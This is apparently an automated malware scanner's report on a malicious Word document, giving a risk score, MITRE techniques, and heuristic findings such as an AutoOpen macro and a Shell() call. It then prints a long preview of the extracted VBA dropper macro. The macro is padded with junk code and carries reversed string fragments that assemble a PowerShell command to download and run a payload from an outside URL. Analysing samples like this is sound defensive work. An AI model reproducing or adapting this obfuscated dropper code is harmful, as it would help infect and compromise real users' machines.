MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes a Shell() call, indicating an attempt to execute arbitrary commands, likely for downloading and running a secondary payload. The ClamAV detection name 'Doc.Dropper.Agent-6549784-0' further supports its role as a dropper.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6549784-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6549784-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 122560 bytes |
SHA-256: 9d94f732bbf1577f8446fb9a8a0c9a46ea82721501c05da8c14c13a8b4c82257 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "MwJFFsB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub iTdRj(OiTZq)
Set cHZzuu = bPMAc
lDpzQZ = hFaDhs
lLSHzf = INbWRq + Atn(FESSB) + 66231 - 96540 / (94093 * Hex(jCzvw))
jVSCS = 39783 + zEDzv
End Sub
Sub pNbzjr(BIkjKd)
Set mlFwjs = jGDPXi
HNPDnV = LFDQE
VYlms = jcMwEO + Atn(rJHXj) + 22395 - 18177 / (74378 * Hex(vUcWIh))
fCiiXQ = 16448 + RXiCM
Set OKpkdz = iTEuh
dQJVjw = jvWjf
AmFMdH = zjKmmi + Atn(Yzjdjq) + 77674 - 60433 / (9389 * Hex(BBDLO))
nGFCz = 32533 + HbnHcw
Set XjCOd = MtzomV
zKbDOk = Wjhcm
UbCwi = iwkSz + Atn(iiFuGQ) + 29738 - 53784 / (67720 * Hex(zzjsri))
rBacVP = 70966 + DFbmiN
End Sub
Sub cOjFIb(QMKYo)
Set CMqTAP = RZMMPU
DKopA = GXUMm
ISlNRz = GnqPHl + Atn(UaDCT) + 81682 - 75547 / (43912 * Hex(GYVXW))
frdha = 13169 + jLvOoO
Set NujDj = jTSsvn
wiowaE = IwlZLM
trGFCY = ILrRq + Atn(sLYlm) + 75041 - 40875 / (57321 * Hex(Wwojj))
OJHrU = 8460 + cMntOf
End Sub
Sub Autoopen()
On Error Resume Next
Set Tzfjhq = aAnYrP
UIQSsz = CkZWTF
MwsYpp = ZTECpL + Atn(ITScot) + 14900 - 7671 / (42908 * Hex(VhuRMF))
NkNNC = 90942 + BaKuo
wRzpAnWcfS (QClFt + CqpUrItYJi + GtfMb)
Set bRDHu = NOroF
aGYSbN = MPKKSw
XvwUiX = Eadwtj + Atn(hZUbzn) + 59277 - 75447 / (87039 * Hex(RRdOtR))
kLFtR = 30572 + GhMVj
End Sub
Sub Vhhofp(iVIKkC)
Set CRuXL = WMibB
KzVPa = GwSkj
jDbYPC = IPFUon + Atn(KXXJzF) + 75293 - 29101 / (60866 * Hex(NGiBdD))
ShFnIj = 95840 + fjsAEc
Set cmwjaI = dCUXjL
UsfMN = HiABr
MUZuPb = jdwDu + Atn(jhDCTk) + 94621 - 73904 / (77009 * Hex(nNnqa))
tlwsA = 91411 + EHFwT
Set fYplki = EfhRt
YJlhbk = HjKGCb
RwvOod = IlzcD + Atn(FVODf) + 96440 - 25025 / (43711 * Hex(TadLd))
vNjjI = 81015 + FkTcQ
End Sub
Sub PXnFYY(mVHaDO)
Set LfVkc = jNYOsu
CPikC = jGifUF
tlZGJf = YraOiA + Atn(wCzZM) + 57756 - 3322 / (65623 * Hex(rWXWh))
czAio = 12185 + oRENAz
End Sub
Attribute VB_Name = "pPBCRkEj"
Sub IblLO(klIMOP)
Set OELKwO = UwdEXj
UUEzFt = sDCvjF
TEnjuP = zrHmq + Atn(lJzhn) + 65218 - 14033 / (29164 * Hex(EPIWh))
AIPOI = 1081 + tqUdR
End Sub
Function CqpUrItYJi()
On Error Resume Next
Set XdzLP = HiFVHB
SCAYaY = fwirXi
kQHMK = hrnGE + Atn(iZmvnH) + 24928 - 20017 / (65941 * Hex(sRuEkt))
uFnhrX = 35536 + IwlQaP
Set aibzn = ZiYczR
QPzUCC = XGQLV
wtYwfw = zjuzPH + Atn(NXvck) + 56264 - 68943 / (58636 * Hex(VZGpi))
URQbwB = 61020 + Zzzoz
haMYiJvHmIh = VSnrmA("wTT+'ed'+'.ira'+'z'+'an'+'dassa//:p'+'tth '+' GHs'+' = XCD'+'A'+'cSb'+';)331'+'282 ,00001(txen'+'.ds'+'adasnc'+'Sb = BSNcSb'+';tnei'+'lCb'+'TDX", 87960 - 87960 + 4 + 87960 - 87960, 87960 - 87960 + 137 + 87960 - 87960)
Set VAEvwz = KobsE
ZDYYJ = LLcjoI
iMVfk = muwUVL + Atn(jlKdoi) + 88377 - 69883 / (12230 * Hex(AYqul))
tQPnz = 32468 + oIqESX
Set qzJhz = NdPCUC
JLJuz = zritS
jmbsBv = ZzbDM + Atn(AqLOMb) + 16072 - 89005 / (14634 * Hex(smlYYX))
HDqHR = 22985 + kNHOcU
pWLaAff = VSnrmA("hKz))43]rAHc[,)55]rAHc[+65]rAHc[+25]rAHc[(EcALper-69]rAHc[,)611]rAHc[+27]rAHc[+701]rAHc[( EcALper- 29]rAHc[,'23d'eCAlPERc-93]rAHc[,'GHs' EcALCqz", 51324 - 51324 + 4 + 51324 - 51324, 51324 - 51324 + 139 + 51324 - 51324)
Set Izwzfo = VSKfYJ
GQWhCh = AVojf
dwTuS = ujonZt + Atn(olkjbs) + 4743 - 4184 / (58274 * Hex(ljZnOI))
JQAOAW = 98107 + NmOzS
Set jVcntV = tSEiG
zzFqN = MzoiX
nViij = pfSEZX + Atn(ZHMFS) + 69804 - 81156 / (62269 * Hex(vWjNm))
MjvmE = 49795 + ziKjV
ZAnjwtF = VSnrmA("TuB0]03[EmohsP$+]12[eMOHsP$ (. JA,SQ", 56601 - 56601 + 6 + 56601 - 56601, 56601 - 56601 + 27 + 56601 - 56601)
Set aBvYia = IArWwj
aaLBVw = TiInS
THhuiO = FLAww + Atn(zKMsZo) + 46162 - 85389 / (61153 * Hex(TJOYS))
TmlPk = 40833 + Swnjj
Set OLbNQu = qkSKun
nHmwEF = jFrSEL
vjdiWj = AXGQb + Atn(UJikI) + 88850 - 52432 / (89954 * Hex(rrLVH))
FkuLiH = 90602 + pfXGn
cvjzVGSl = VSnrmA("aC'784gN'+'tHkitHkrtSo'+'T784.'+'c'+'fsacSb'+'('+'7'+'84QPP9Q", 53351 - 53351 + 6 + 53351 - 53351, 53351 - 53351 + 54 + 53351 - 53351)
Set kf
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.